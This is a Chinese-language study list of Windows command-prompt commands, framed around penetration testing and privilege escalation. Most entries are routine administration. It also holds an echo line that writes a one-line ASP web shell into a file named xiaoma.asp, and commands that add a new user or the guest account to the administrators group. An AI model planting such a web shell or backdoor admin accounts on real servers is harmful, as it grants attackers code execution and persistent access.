常用cmd命令学习

常用cmd命令学习

cd,pushd 切换目录
md 创建目录
rd 删除目录
echo ^<%execute request("1")%^> >>f:\xiaoma.asp   向xiaoma.asp文件中写入语句
del f:\xiaoma.asp 删除文件
dir c:\
tree e:\

ver  查看系统版本
systeminfo 查看系统信息

net start 查看所有系统服务
net stop xxxservice 关闭某个服务

netstat -an 查看本地端口开放情况
netstat -anb 查看本地端口开放情况及其可执行组件
netstat -ano 查看本地端口开放情况及其相关的进程id

net user 查看系统所有用户 带$符号的无法查看
net user administrator 看看系统管理员信息
net user myname mypwd /add  创建用户
net localgroup administrators myname /add提升user用户至管理员权限
net user myname /del  删除用户
net user guest 123455 将来宾账户密码更改为123456
net localgroup administrators guest /add 将guest用户提升到管理员权限
net user guest /active:yes 激活guest
net user guest /active:no 停止guest账户
net localgroup 查看本地所有组信息

ping 192.168.0.1 判断网络畅通 根据TTL可初步判断操作系统
ping www.baidu.com  可以ping website(/ip)
ipconfig 查看网络环境
ipconfig /add

内网渗透
net view  显示正由指定计算机共享的域,计算机,或资源的列表.没有参数则显示当前域中计算机

的列表

telnet 远程登录 使用23端口 (无加密,所以一般使用SSH远程登录 ,SSH属于加密传输)
telnet 127.0.0.1 23

渗透命令中用户权限的查看
whoami 查看当前用户权限

渗透中的路由跟踪
tracert  检测计算机经过几个路由中转到目的地IP命令 多用在嗅探和ARP攻击 截获敏感数据 如

ftp mssql mysql 等的密口令
tracert x.x.x.x

对注册表的操作:-----这部分实例没成功...
导出远程桌面注册表
Usage:regedit /e filename [regpath]
regedit -e d:\1.reg "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal

Server\\Wds\\rdpwd\\Tds\\tcp"
regedit -s d:\1.reg  导入修改后的注册表

regedit /e c:\1.reg "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal

Server\\Wds\\rdpwd\\Tds\\tcp"


查看与注销登录用户
query user
 查看当前登录用户 可以获取id
logoff id号  注销指定账户

渗透命令中的tasklist taskkill(ver>=xp)
tasklist /svc 查看系统进程提供的服务
taskkill /pid pid号 /f 强制杀掉指定进程

渗透命令中SC的应用  一般配合net start使用
sc qc "service"   加引号 获取service的安装路径 query service config信息

提权渗透中regsvr32命令
regsvr32 WSHom.Ocx /u 卸载wscript.shell对象
regsvr32.exe scrrun.dll /u  卸载FSO对象
regsvr32 /s /u "c:\program files\common files\system\ado\msado15.dll" 卸载stream对象
regsvr32.exe shell32.dll /u 禁用shell.Application组件
恢复这些组件和对象的话 去掉/u就行,/s是安静模式